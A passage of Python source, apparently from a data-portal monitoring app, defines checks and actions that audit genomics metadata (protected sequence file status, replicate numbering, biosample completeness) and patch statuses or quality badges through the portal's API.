res = ff_utils.patch_metadata(val, uid, key=connection.ff_keys)
except:
action_logs['patch_failure'].append(uid)
else:
if res.get('status') == 'success':
action_logs['patch_success'].append(uid)
else:
action_logs['patch_failure'].append(uid)
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def check_fastq_read_id(connection, **kwargs):
'''
Reports if there are uploaded fastq files with integer read ids
'''
check = CheckResult(connection, 'check_fastq_read_id')
check.description = 'Reports fastq files that have integer read ids uploaded after 2020-04-13'
check.summary = 'No fastq files with integer ids'
check.full_output = {}
check.status = 'PASS'
query = '/search/?date_created.from=2020-04-13&file_format.file_format=fastq&status=uploaded&type=FileFastq'
res = ff_utils.search_metadata(query, key=connection.ff_keys)
if not res:
return check
target_files = {}
for a_re in res:
if a_re.get('file_first_line'):
read_id = a_re['file_first_line'].split(' ')[0][1:]
if read_id.isnumeric():
if a_re.get('experiments'):
exp = a_re['experiments'][0]['@id']
exp_title = a_re['experiments'][0]['display_title']
else:
exp = 'No experiment associated'
exp_title = ''
if exp not in target_files:
target_files[exp] = {'title': exp_title, 'files': []}
target_files[exp]['files'].append(a_re['accession'])
if target_files:
check.status = 'WARN'
check.summary = '%s fastq files have integer read ids' % (sum([len(v['files']) for i, v in target_files.items()]))
check.full_output = target_files
return check
@check_function()
def released_protected_data_files(connection, **kwargs):
'''
Check if fastq or bam files from IndividualHuman with protected_data=True
have a visible status
'''
check = CheckResult(connection, 'released_protected_data_files')
visible_statuses = ['released to project', 'released', 'archived to project', 'archived', 'replaced']
formats = ['fastq', 'bam']
query = 'search/?type=File'
query += ''.join(['&file_format.file_format=' + f for f in formats])
query += '&experiments.biosample.biosource.individual.protected_data=true'
query += ''.join(['&status=' + s for s in visible_statuses])
query += '&field=file_format&field=status&field=open_data_url'
res = ff_utils.search_metadata(query, key=connection.ff_keys)
files = {'visible': []}
files_with_open_data_url = False
for a_file in res:
file_report = {
'@id': a_file['@id'],
'file_format': a_file['file_format']['file_format'],
'file_status': a_file['status']}
if a_file.get('open_data_url'):
files_with_open_data_url = True
file_report['open_data_url'] = a_file['open_data_url']
files['visible'].append(file_report)
if files['visible']:
check.status = 'WARN'
check.summary = 'Found visible sequence files that should be restricted'
check.description = '%s fastq or bam files from restricted individuals found with status: %s' % (len(files['visible']), str(visible_statuses).strip('[]'))
check.action_message = 'Will attempt to patch %s files to status=restricted' % len(files['visible'])
check.allow_action = True
if files_with_open_data_url:
check.description += '\nNOTE: some files are in AWS Open Data bucket and should be moved manually'
else:
check.status = 'PASS'
check.summary = 'No unrestricted fastq or bam files found from individuals with protected_data'
check.description = 'No fastq or bam files from restricted individuals found with status: %s' % str(visible_statuses).strip('[]')
check.brief_output = {'visible': '%s files' % len(files['visible'])}
check.full_output = files
check.action = 'restrict_files'
return check
@check_function()
def released_output_from_restricted_input(connection, **kwargs):
'''
Check if fastq or bam files produced by workflows with restricted input
files (typically because deriving from HeLa cells) have a visible status.
In addition, check if any fastq or bam processed file (with visible
status) is not output of a workflow ('unlinked'). If this happens, the
check cannot ensure that all processed files are analyzed.
'''
check = CheckResult(connection, 'released_output_from_restricted_input')
visible_statuses = ['released to project', 'released', 'archived to project', 'archived', 'replaced']
formats = ['fastq', 'bam']
query_wfr = 'search/?type=WorkflowRun'
query_wfr += '&input_files.value.status=restricted'
query_wfr += ''.join(['&output_files.value.status=' + s for s in visible_statuses])
query_wfr += ''.join(['&output_files.value.file_format.display_title=' + f for f in formats])
query_wfr += '&field=output_files'
res_wfr = ff_utils.search_metadata(query_wfr, key=connection.ff_keys)
# this returns wfrs that have AT LEAST one output file with these values
files = {'visible': [], 'unlinked': []}
files_with_open_data_url = False
for a_wfr in res_wfr:
for a_file in a_wfr.get('output_files', []):
if a_file.get('value'):
format = a_file['value']['file_format']['display_title']
status = a_file['value']['status']
if format in formats and status in visible_statuses:
file_report = {
'@id': a_file['value']['@id'],
'file_format': format,
'file_status': status}
if a_file['value'].get('open_data_url'):
files_with_open_data_url = True
file_report['open_data_url'] = a_file['value']['open_data_url']
files['visible'].append(file_report)
# search for visible fastq or bam processed files that are not output of any workflow
query_pf = 'search/?type=FileProcessed&workflow_run_outputs.workflow.title=No+value'
query_pf += ''.join(['&status=' + st for st in visible_statuses])
query_pf += ''.join(['&file_format.file_format=' + f for f in formats])
query_pf += '&field=file_format&field=status&field=open_data_url'
res_pf = ff_utils.search_metadata(query_pf, key=connection.ff_keys)
for a_file in res_pf:
file_report = {
'@id': a_file['@id'],
'file_format': a_file['file_format']['display_title'],
'file_status': a_file['status']}
if a_file.get('open_data_url'):
files_with_open_data_url = True
file_report['open_data_url'] = a_file['open_data_url']
files['unlinked'].append(file_report)
if files['visible'] or files['unlinked']:
check.status = 'WARN'
check.summary = "Problematic processed files found"
check.description = "Found %s problematic FASTQ or BAM processed files: 'visible' files should be restricted" % (len(files['visible']) + len(files['unlinked']))
if files['unlinked']:
check.description += "; 'unlinked' files are not output of any workflow, therefore cannot be analyzed (consider linking)"
if files['visible']:
check.allow_action = True
check.action_message = "Will attempt to patch %s 'visible' files to status=restricted" % len(files['visible'])
if files_with_open_data_url:
check.description += '\nNOTE: some files are in AWS Open Data bucket and should be moved manually'
else:
check.status = 'PASS'
check.summary = "No problematic processed files found"
check.description = "No visible output files found from wfr with restricted files as input"
check.full_output = files
check.brief_output = {'visible': '%s files' % len(files['visible']),
'unlinked': '%s files' % len(files['unlinked'])}
check.action = 'restrict_files'
return check
@action_function()
def restrict_files(connection, **kwargs):
'''
Patch the status of visible sequence files to "restricted"
'''
action = ActionResult(connection, 'restrict_files')
check_res = action.get_associated_check_result(kwargs)
files_to_patch = check_res['full_output']['visible']
action_logs = {'patch_success': [], 'patch_failure': []}
patch = {'status': 'restricted'}
for a_file in files_to_patch:
try:
            ff_utils.patch_metadata(patch, a_file['@id'], key=connection.ff_keys)
        except Exception as e:
            action_logs['patch_failure'].append({a_file['@id']: str(e)})
        else:
            action_logs['patch_success'].append(a_file['@id'])
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function(days_delay=14)
def external_submission_but_missing_dbxrefs(connection, **kwargs):
''' Check if items with external_submission also have dbxrefs.
When exporting metadata for submission to an external repository,
external_submission is patched. After some time (delay), the corresponding
dbxref should also have been received and patched.
'''
check = CheckResult(connection, 'external_submission_but_missing_dbxrefs')
delay = kwargs.get('days_delay')
try:
delay = int(delay)
except (ValueError, TypeError):
delay = 14
date_now = datetime.datetime.now(datetime.timezone.utc)
days_diff = datetime.timedelta(days=delay)
to_date = datetime.datetime.strftime(date_now - days_diff, "%Y-%m-%d %H:%M")
query = ('search/?type=ExperimentSet&type=Experiment&type=Biosample&type=FileFastq' +
'&dbxrefs=No+value&external_submission.date_exported.to=' + to_date)
items = ff_utils.search_metadata(query + '&field=dbxrefs&field=external_submission', key=connection.ff_keys)
grouped_results = {}
if items:
for i in items:
grouped_results.setdefault(i['@type'][0], []).append(i['@id'])
check.brief_output = {i_type: len(ids) for i_type, ids in grouped_results.items()}
check.full_output = grouped_results
check.status = 'WARN'
check.summary = 'Items missing dbxrefs found'
check.description = '{} items exported for external submission more than {} days ago but still without dbxrefs'.format(len(items), delay)
else:
check.status = 'PASS'
check.summary = 'No items missing dbxrefs found'
check.description = 'All items exported for external submission more than {} days ago have dbxrefs'.format(delay)
return check
```
#### File: chalicelib/checks/badge_checks.py
```python
import re
import requests
import datetime
import json
from dcicutils import ff_utils
# Use confchecks to import decorators object and its methods for each check module
# rather than importing check_function, action_function, CheckResult, ActionResult
# individually - they're now part of class Decorators in foursight-core::decorators
# that requires initialization with foursight prefix.
from .helpers.confchecks import *
REV = ['in review by lab', 'submission in progress']
REV_KEY = 'In review by lab/Submission in progress'
RELEASED_KEY = 'Released/Released to project/Pre-release/Archived'
def stringify(item):
if isinstance(item, str):
return item
elif isinstance(item, list):
return '[' + ', '.join([stringify(i) for i in item]) + ']'
elif isinstance(item, dict):
return '{' + ', '.join(['{}: {}'.format(k, str(v)) for k, v in sorted(item.items())]) + '}'
elif isinstance(item, float) and abs(item - int(item)) == 0:
return str(int(item))
return str(item)
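# Examples of stringify behaviour:
#   stringify(2.0)              -> '2'
#   stringify(['a', 'b'])       -> '[a, b]'
#   stringify({'b': 1, 'a': 2}) -> '{a: 2, b: 1}'  (dict keys are sorted)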
def compare_badges(obj_ids, item_type, badge, ff_keys):
'''
Compares items that should have a given badge to items that do have the given badge.
Used for badges that utilize a single message choice.
Input (first argument) should be a list of item @ids.
'''
search_url = 'search/?type={}&badges.badge.@id=/badges/{}/'.format(item_type, badge)
has_badge = ff_utils.search_metadata(search_url + '&frame=object', key=ff_keys)
needs_badge = []
badge_ok = []
remove_badge = {}
for item in has_badge:
if item['@id'] in obj_ids:
# handle differences in badge messages
badge_ok.append(item['@id'])
else:
keep = [badge_dict for badge_dict in item['badges'] if badge not in badge_dict['badge']]
remove_badge[item['@id']] = keep
for other_item in obj_ids:
if other_item not in badge_ok:
needs_badge.append(other_item)
return needs_badge, remove_badge, badge_ok
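# compare_badges returns a 3-tuple:
#   needs_badge  - @ids that should have the badge but currently do not
#   remove_badge - mapping of @id -> remaining badges for items that should lose the badge
#   badge_ok     - @ids whose badge is already correct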
def compare_badges_and_messages(obj_id_dict, item_type, badge, ff_keys):
'''
Compares items that should have a given badge to items that do have the given badge.
Also compares badge messages to see if the message is the right one or needs to be updated.
Input (first argument) should be a dictionary of item's @id and the badge message it should have.
'''
search_url = 'search/?type={}&badges.badge.@id=/badges/{}/'.format(item_type, badge)
has_badge = ff_utils.search_metadata(search_url + '&frame=object', key=ff_keys)
needs_badge = {}
badge_edit = {}
badge_ok = []
remove_badge = {}
for item in has_badge:
if item['@id'] in obj_id_dict.keys():
# handle differences in badge messages
for a_badge in item['badges']:
if a_badge['badge'].endswith(badge + '/'):
if a_badge.get('messages') == obj_id_dict[item['@id']]:
badge_ok.append(item['@id'])
else:
if a_badge.get('message'):
del a_badge['message']
a_badge['messages'] = obj_id_dict[item['@id']]
badge_edit[item['@id']] = item['badges']
break
else:
this_badge = [a_badge for a_badge in item['badges'] if badge in a_badge['badge']][0]
item['badges'].remove(this_badge)
remove_badge[item['@id']] = item['badges']
for key, val in obj_id_dict.items():
if key not in badge_ok + list(badge_edit.keys()):
needs_badge[key] = val
return needs_badge, remove_badge, badge_edit, badge_ok
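# compare_badges_and_messages returns the same information as compare_badges plus
# badge_edit: a mapping of @id -> the full badges list with updated messages, for
# items that keep the badge but need the message changed.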
def patch_badges(full_output, badge_name, ff_keys, single_message=''):
'''
General function for patching badges.
For badges with single message choice:
- single_message kwarg should be assigned a string to be used for the badge message;
- full_output[output_keys[0]] should be a list of item @ids;
- no badges are edited, they are only added or removed.
For badges with multiple message options:
- single_message kwarg should not be used, but left as empty string.
- full_output[output_keys[0]] should be a list of item @ids and message to patch into badge.
- badges can also be edited to change the message.
'''
patches = {'add_badge_success': [], 'add_badge_failure': [],
'remove_badge_success': [], 'remove_badge_failure': []}
badge_id = '/badges/' + badge_name + '/'
output_keys = ['Add badge', 'Remove badge']
if isinstance(full_output[output_keys[0]], list):
add_list = full_output[output_keys[0]]
elif isinstance(full_output[output_keys[0]], dict):
patches['edit_badge_success'] = []
patches['edit_badge_failure'] = []
output_keys.append('Keep badge and edit messages')
add_list = full_output[output_keys[0]].keys()
for add_key in add_list:
add_result = ff_utils.get_metadata(add_key + '?frame=object&field=badges', key=ff_keys)
badges = add_result['badges'] if add_result.get('badges') else []
badges.append({'badge': badge_id, 'messages': [single_message] if single_message else full_output[output_keys[0]][add_key]})
if [b['badge'] for b in badges].count(badge_id) > 1:
# print an error message?
patches['add_badge_failure'].append('{} already has badge'.format(add_key))
continue
try:
response = ff_utils.patch_metadata({"badges": badges}, add_key[1:], key=ff_keys)
if response['status'] == 'success':
patches['add_badge_success'].append(add_key)
else:
patches['add_badge_failure'].append(add_key)
except Exception:
patches['add_badge_failure'].append(add_key)
for remove_key, remove_val in full_output[output_keys[1]].items():
# delete field if no badges?
try:
if remove_val:
response = ff_utils.patch_metadata({"badges": remove_val}, remove_key, key=ff_keys)
else:
response = ff_utils.patch_metadata({}, remove_key + '?delete_fields=badges', key=ff_keys)
if response['status'] == 'success':
patches['remove_badge_success'].append(remove_key)
else:
patches['remove_badge_failure'].append(remove_key)
except Exception:
patches['remove_badge_failure'].append(remove_key)
if len(output_keys) > 2:
for edit_key, edit_val in full_output[output_keys[2]].items():
try:
response = ff_utils.patch_metadata({"badges": edit_val}, edit_key, key=ff_keys)
if response['status'] == 'success':
patches['edit_badge_success'].append(edit_key)
else:
patches['edit_badge_failure'].append(edit_key)
except Exception:
patches['edit_badge_failure'].append(edit_key)
return patches
@check_function()
def yellow_flag_biosamples(connection, **kwargs):
'''
Checks biosamples for required metadata:
1. Culture harvest date, doubling number, passage number, culture duration
2. Morphology image
3. Karyotyping (authentication doc or string field) for any biosample derived
from pluripotent cell line that has been passaged more than 10 times beyond
the first thaw of the original vial.
4. Differentiation authentication for differentiated cells.
5. HAP-1 biosamples must have ploidy authentication.
'''
check = CheckResult(connection, 'yellow_flag_biosamples')
results = ff_utils.search_metadata('search/?type=Biosample', key=connection.ff_keys)
flagged = {}
check.brief_output = {RELEASED_KEY: {}, REV_KEY: []}
for result in results:
messages = []
bs_types = [bs.get('biosource_type') for bs in result.get('biosource', [])]
karyotype = False
diff_auth = False
ploidy = False
bccs = result.get('cell_culture_details', [])
if not bccs:
if len([t for t in bs_types if t in ['primary cell', 'tissue', 'multicellular organism']]) != len(bs_types):
messages.append('Biosample missing Cell Culture Details')
else:
for bcc in bccs:
for item in [
'culture_harvest_date', 'doubling_number', 'passage_number', 'culture_duration', 'morphology_image'
]:
if not bcc.get(item):
messages.append('Biosample missing {}'.format(item))
if bcc.get('karyotype'):
karyotype = True
for protocol in bcc.get('authentication_protocols', []):
protocol_item = ff_utils.get_metadata(protocol['@id'], key=connection.ff_keys)
auth_type = protocol_item.get('protocol_classification')
if not karyotype and auth_type == 'Karyotype Authentication':
karyotype = True
elif auth_type == 'Differentiation Authentication':
diff_auth = True
elif auth_type == 'Ploidy Authentication':
ploidy = True
passages = bcc.get('passage_number', 0)
if 'tem cell' in ''.join(bs_types) and not karyotype:
if passages > 10:
messages.append('Biosample is a stem cell line over 10 passages but missing karyotype')
elif not passages:
messages.append('Biosample is a stem cell line with unknown passage number missing karyotype')
if result.get('biosample_type') == 'In vitro differentiated cells' and not diff_auth:
messages.append('Differentiated biosample missing differentiation authentication')
if 'HAP-1' in result.get('biosource_summary') and not ploidy:
messages.append('HAP-1 biosample missing ploidy authentication')
if messages:
messages = [messages[i] for i in range(len(messages)) if messages[i] not in messages[:i]]
if result.get('status') in REV:
check.brief_output[REV_KEY].append('{} missing {}'.format(
result['@id'], ', '.join(list(set([item[item.index('missing') + 8:] for item in messages])))
))
else:
flagged[result['@id']] = messages
to_add, to_remove, to_edit, ok = compare_badges_and_messages(
flagged, 'Biosample', 'biosample-metadata-incomplete', connection.ff_keys
)
check.action = 'patch_biosample_warning_badges'
if to_add or to_remove or to_edit:
check.status = 'WARN'
check.summary = 'Yellow flag biosample badges need patching'
check.description = '{} biosamples need warning badges patched'.format(
len(to_add.values()) + len(to_remove.values()) + len(to_edit.values())
)
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Yellow flag biosample badges up-to-date'
check.description = 'No yellow flag biosample badges need patching'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge and edit messages': to_edit,
'Keep badge (no change)': ok}
check.brief_output[RELEASED_KEY] = {
'Add badge': ['{} missing {}'.format(
k, ', '.join([item[item.index('missing') + 8:] for item in flagged[k]])
) for k in to_add.keys()],
'Remove badge': list(to_remove.keys()),
'Keep badge and edit messages': ['{} missing {}'.format(
k, ', '.join([item[item.index('missing') + 8:] for item in flagged[k]])
) for k in to_edit.keys()]
}
return check
@action_function()
def patch_biosample_warning_badges(connection, **kwargs):
action = ActionResult(connection, 'patch_biosample_warning_badges')
bs_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
bs_check_result['full_output'], 'biosample-metadata-incomplete', connection.ff_keys
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for yellow flag biosamples.'
return action
@check_function()
def gold_biosamples(connection, **kwargs):
'''
Gold level commendation criteria:
1. Tier 1 or Tier 2 Cells obtained from the approved 4DN source and grown
precisely according to the approved SOP including any additional
authentication (eg. HAP-1 haploid line requires ploidy authentication).
2. All required metadata present (does not have a biosample warning badge).
'''
check = CheckResult(connection, 'gold_biosamples')
search_url = ('search/?biosource.cell_line_tier=Tier+1&biosource.cell_line_tier=Tier+2'
'&type=Biosample&badges.badge.warning=No+value')
results = ff_utils.search_metadata(search_url, key=connection.ff_keys)
gold = []
for result in results:
# follows SOP w/ no deviations
sop = True if all([bcc.get('follows_sop', '') == 'Yes' for bcc in result.get('cell_culture_details', [])]) else False
if sop and result.get('status') not in REV:
gold.append(result['@id'])
to_add, to_remove, ok = compare_badges(gold, 'Biosample', 'gold-biosample', connection.ff_keys)
check.action = 'patch_gold_biosample_badges'
if to_add or to_remove:
check.status = 'WARN'
check.summary = 'Gold biosample badges need patching'
check.description = '{} biosamples need gold badges patched. '.format(len(to_add) + len(to_remove))
check.description += 'Yellow_flag_biosamples check must pass before patching.'
yellow_check = CheckResult(connection, 'yellow_flag_biosamples')
latest_yellow = yellow_check.get_latest_result()
if latest_yellow['status'] == 'PASS':
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Gold biosample badges up-to-date'
check.description = 'No gold biosample badges need patching'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge (no change)': ok}
return check
@action_function()
def patch_gold_biosample_badges(connection, **kwargs):
action = ActionResult(connection, 'patch_gold_biosample_badges')
gold_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
gold_check_result['full_output'], 'gold-biosample', connection.ff_keys,
single_message=('Biosample receives gold status for being a 4DN Tier 1 or Tier 2'
' cell line that follows the approved SOP and contains all of the '
'pertinent metadata information as required by the 4DN Samples working group.')
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for gold biosamples.'
return action
@check_function()
def repsets_have_bio_reps(connection, **kwargs):
'''
Check for replicate experiment sets that have one of the following issues:
1) Only a single biological replicate (includes sets with single experiment)
2) Biological replicate numbers that are not in sequence
3) Technical replicate numbers that are not in sequence
Action patches badges with a message detailing which of the above issues is relevant.
'''
check = CheckResult(connection, 'repsets_have_bio_reps')
results = ff_utils.search_metadata('search/?type=ExperimentSetReplicate&frame=object',
key=connection.ff_keys, page_limit=50)
audits = {
REV_KEY: {'single_biorep': [], 'biorep_nums': [], 'techrep_nums': []},
RELEASED_KEY: {'single_biorep': [], 'biorep_nums': [], 'techrep_nums': []}
}
by_exp = {}
for result in results:
rep_dict = {}
exp_audits = []
if result.get('replicate_exps'):
rep_dict = {}
for exp in result['replicate_exps']:
if exp['bio_rep_no'] in rep_dict.keys():
rep_dict[exp['bio_rep_no']].append(exp['tec_rep_no'])
else:
rep_dict[exp['bio_rep_no']] = [exp['tec_rep_no']]
if rep_dict:
if result.get('status') in REV:
audit_key = REV_KEY
else:
audit_key = RELEASED_KEY
# check if single biological replicate
if len(rep_dict.keys()) == 1:
# this tag labels an ExpSet with many replicates, but only one present in the database (typically imaging datasets)
if 'many_replicates' in result.get('tags', []): # skip false positive
continue
audits[audit_key]['single_biorep'].append(result['@id'])
exp_audits.append('Replicate set contains only a single biological replicate')
# check if bio rep numbers not in sequence
if sorted(list(rep_dict.keys())) != list(range(min(rep_dict.keys()), max(rep_dict.keys()) + 1)):
audits[audit_key]['biorep_nums'].append('{} - bio rep #s:'
' {}'.format(result['@id'], str(sorted(list(rep_dict.keys())))))
exp_audits.append('Biological replicate numbers are not in sequence')
# check if tech rep numbers not in sequence
for key, val in rep_dict.items():
if sorted(val) != list(range(min(val), max(val) + 1)):
audits[audit_key]['techrep_nums'].append('{} - tech rep #s of biorep {}:'
' {}'.format(result['@id'], key, str(sorted(val))))
exp_audits.append('Technical replicate numbers of biological replicate {}'
' are not in sequence'.format(key))
if exp_audits and result.get('status') not in REV:
by_exp[result['@id']] = sorted(exp_audits)
to_add, to_remove, to_edit, ok = compare_badges_and_messages(by_exp, 'ExperimentSetReplicate',
'replicate-numbers', connection.ff_keys)
check.action = 'patch_badges_for_replicate_numbers'
if to_add or to_remove or to_edit:
check.status = 'WARN'
check.summary = 'Replicate number badges need patching'
check.description = '{} replicate experiment sets need replicate badges patched'.format(
len(to_add.values()) + len(to_remove.values()) + len(to_edit.values())
)
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Replicate number badges up-to-date'
check.description = 'No replicate number badges need patching'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge and edit messages': to_edit,
'Keep badge (no change)': ok}
check.brief_output = {REV_KEY: audits[REV_KEY]}
check.brief_output[RELEASED_KEY] = {
k: {'single_biorep': [], 'biorep_nums': [], 'techrep_nums': []} for k in check.full_output.keys()
}
for k, v in audits[RELEASED_KEY].items():
for item in v:
name = item.split(' ')[0]
for key in ["Add badge", 'Remove badge', 'Keep badge and edit messages']:
if name in check.full_output[key].keys():
check.brief_output[RELEASED_KEY][key][k].append(item)
if name in check.full_output['Keep badge (no change)']:
check.brief_output[RELEASED_KEY]['Keep badge (no change)'][k].append(item)
return check
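# Illustrative sketch (not part of the original check): the 'in sequence' test above only accepts
# replicate numbers that form a contiguous run starting at their minimum.
def _sketch_reps_in_sequence(rep_nums):
    """Return True if the given bio/tec replicate numbers are contiguous."""
    return sorted(rep_nums) == list(range(min(rep_nums), max(rep_nums) + 1))
# e.g. _sketch_reps_in_sequence([1, 2, 3]) -> True, but _sketch_reps_in_sequence([1, 3]) -> False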
@action_function()
def patch_badges_for_replicate_numbers(connection, **kwargs):
action = ActionResult(connection, 'patch_badges_for_replicate_numbers')
rep_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(rep_check_result['full_output'], 'replicate-numbers', connection.ff_keys)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for replicate numbers'
return action
@check_function()
def exp_has_raw_files(connection, **kwargs):
'''
Check for sequencing experiments that don't have raw files
Action patches badges
'''
check = CheckResult(connection, 'exp_has_raw_files')
# search all experiments except microscopy experiments for missing files field
no_files = ff_utils.search_metadata('search/?type=Experiment&%40type%21=ExperimentMic&files.uuid=No+value',
key=connection.ff_keys)
# also check sequencing experiments whose files items are all uploading/archived/deleted
bad_status = ff_utils.search_metadata('search/?status=uploading&status=archived&status=deleted&status=upload+failed'
'&type=FileFastq&experiments.uuid%21=No+value',
key=connection.ff_keys)
bad_status_ids = {item['@id']: item['status'] for item in bad_status}
exps = list(set(exp['@id'] for fastq in bad_status
                for exp in fastq.get('experiments', [])))
missing_files_released = [e['@id'] for e in no_files if e.get('status') not in REV]
missing_files_in_rev = [e['@id'] for e in no_files if e.get('status') in REV]
for expt in exps:
result = ff_utils.get_metadata(expt, key=connection.ff_keys)
raw_files = False
if result.get('files'):
for fastq in result.get('files'):
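# a file counts as a usable raw file if it is not in one of the bad statuses, or if the
# experiment itself shares that status (e.g. an archived experiment with archived fastqs)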
if fastq['@id'] not in bad_status_ids or result['status'] == bad_status_ids[fastq['@id']]:
raw_files = True
break
if not raw_files:
if result.get('status') in REV:
missing_files_in_rev.append(expt)
else:
missing_files_released.append(expt)
to_add, to_remove, ok = compare_badges(missing_files_released, 'Experiment', 'no-raw-files', connection.ff_keys)
if to_add or to_remove:
check.status = 'WARN'
check.summary = 'Raw Files badges need patching'
check.description = '{} sequencing experiments need raw files badges patched'.format(
len(to_add) + len(to_remove)
)
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Raw Files badges up-to-date'
check.description = 'No sequencing experiments need raw files badges patched'
check.action = 'patch_badges_for_raw_files'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge': ok}
check.brief_output = {REV_KEY: missing_files_in_rev,
RELEASED_KEY: {'Add badge': to_add, 'Remove badge': to_remove}}
return check
@action_function()
def patch_badges_for_raw_files(connection, **kwargs):
action = ActionResult(connection, 'patch_badges_for_raw_files')
raw_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
raw_check_result['full_output'], 'no-raw-files', connection.ff_keys, single_message='Raw files missing'
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for experiments missing raw files.'
return action
@check_function()
def consistent_replicate_info(connection, **kwargs):
'''
Check for replicate experiment sets that have discrepancies in metadata between
replicate experiments.
Action patches badges with a message detailing which fields have the inconsistencies
and what the inconsistent values are.
'''
check = CheckResult(connection, 'consistent_replicate_info')
repset_url = 'search/?type=ExperimentSetReplicate&field=experiments_in_set.%40id&field=uuid&field=status&field=lab.display_title'
exp_url = 'search/?type=Experiment&frame=object'
bio_url = 'search/?type=Experiment&field=biosample'
repsets = [item for item in ff_utils.search_metadata(repset_url, key=connection.ff_keys) if item.get('experiments_in_set')]
exps = ff_utils.search_metadata(exp_url, key=connection.ff_keys)
biosamples = ff_utils.search_metadata(bio_url, key=connection.ff_keys)
exp_keys = {exp['@id']: exp for exp in exps}
bio_keys = {bs['@id']: bs['biosample'] for bs in biosamples}
fields2check = [
'lab',
'award',
'experiment_type',
'crosslinking_method',
'crosslinking_time',
'crosslinking_temperature',
'digestion_enzyme',
'enzyme_lot_number',
'digestion_time',
'digestion_temperature',
'tagging_method',
'tagging_rounds',
'ligation_time',
'ligation_temperature',
'ligation_volume',
'biotin_removed',
'protocol',
'protocol_variation',
'follows_sop',
'average_fragment_size',
'fragment_size_range',
'fragmentation_method',
'fragment_size_selection_method',
'rna_tag',
'target_regions',
'dna_label',
'labeling_time',
'antibody',
'antibody_lot_id',
'microscopy_technique',
'imaging_paths',
]
check.brief_output = {REV_KEY: {}, RELEASED_KEY: {
'Add badge': {}, 'Remove badge': {}, 'Keep badge and edit messages': {}
}}
compare = {}
results = {}
for repset in repsets:
info_dict = {}
exp_list = [item['@id'] for item in repset['experiments_in_set']]
for field in fields2check:
vals = [stringify(exp_keys[exp].get(field)) for exp in exp_list]
if field == 'average_fragment_size' and 'None' not in vals:
int_vals = [int(val) for val in vals]
if (max(int_vals) - min(int_vals))/(sum(int_vals)/len(int_vals)) < 0.25:
continue
if len(set(vals)) > 1:
info_dict[field] = vals
for bfield in ['treatments_summary', 'modifications_summary']:
bvals = [stringify(bio_keys[exp].get(bfield)) for exp in exp_list]
if len(set(bvals)) > 1:
info_dict[bfield] = bvals
biosource_vals = [stringify([item['@id'] for item in bio_keys[exp].get('biosource')]) for exp in exp_list]
if len(set(biosource_vals)) > 1:
info_dict['biosource'] = biosource_vals
if [True for exp in exp_list if bio_keys[exp].get('cell_culture_details')]:
for ccfield in ['synchronization_stage', 'differentiation_stage', 'follows_sop']:
ccvals = [stringify([item['@id'] for item in bio_keys[exp].get('cell_culture_details').get(ccfield)]) for exp in exp_list]
if len(set(ccvals)) > 1:
info_dict[ccfield] = ccvals
if [True for exp in exp_list if bio_keys[exp].get('biosample_protocols')]:
bp_vals = [stringify([item['@id'] for item in bio_keys[exp].get('biosample_protocols', [])]) for exp in exp_list]
if len(set(bp_vals)) > 1:
info_dict['biosample_protocols'] = bp_vals
if info_dict:
info = sorted(['{}: {}'.format(k, stringify(v)) for k, v in info_dict.items()])
#msg = 'Inconsistent replicate information in field(s) - ' + '; '.join(info)
msgs = ['Inconsistent replicate information in ' + item for item in info]
text = '{} - inconsistency in {}'.format(repset['@id'][-13:-1], ', '.join(list(info_dict.keys())))
lab = repset['lab']['display_title']
audit_key = REV_KEY if repset['status'] in REV else RELEASED_KEY
results[repset['@id']] = {'status': audit_key, 'lab': lab, 'info': text}
if audit_key == REV_KEY:
if lab not in check.brief_output[audit_key]:
check.brief_output[audit_key][lab] = []
check.brief_output[audit_key][lab].append(text)
if repset['status'] not in REV:
compare[repset['@id']] = msgs
to_add, to_remove, to_edit, ok = compare_badges_and_messages(
compare, 'ExperimentSetReplicate', 'inconsistent-replicate-info', connection.ff_keys
)
key_dict = {'Add badge': to_add, 'Remove badge': to_remove, 'Keep badge and edit messages': to_edit}
for result in results.keys():
for k, v in key_dict.items():
if result in v.keys():
if results[result]['lab'] not in check.brief_output[RELEASED_KEY][k].keys():
check.brief_output[RELEASED_KEY][k][results[result]['lab']] = []
check.brief_output[RELEASED_KEY][k][results[result]['lab']].append(results[result]['info'])
break
check.brief_output[RELEASED_KEY]['Remove badge'] = list(to_remove.keys())
if to_add or to_remove or to_edit:
check.status = 'WARN'
check.summary = 'Replicate Info badges need patching'
check.description = ('{} ExperimentSetReplicates found that need a replicate-info badge patched'
''.format(len(to_add.keys()) + len(to_remove.keys()) + len(to_edit.keys())))
else:
check.status = 'PASS'
check.summary = 'Replicate Info badges are up-to-date'
check.description = 'No ExperimentSetReplicates found that need a replicate-info badge patched'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge and edit messages': to_edit,
'Keep badge (no change)': ok}
check.action = 'patch_badges_for_inconsistent_replicate_info'
if to_add or to_remove or to_edit:
check.allow_action = True
return check
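# Illustrative sketch (not part of the original check): average_fragment_size values are only
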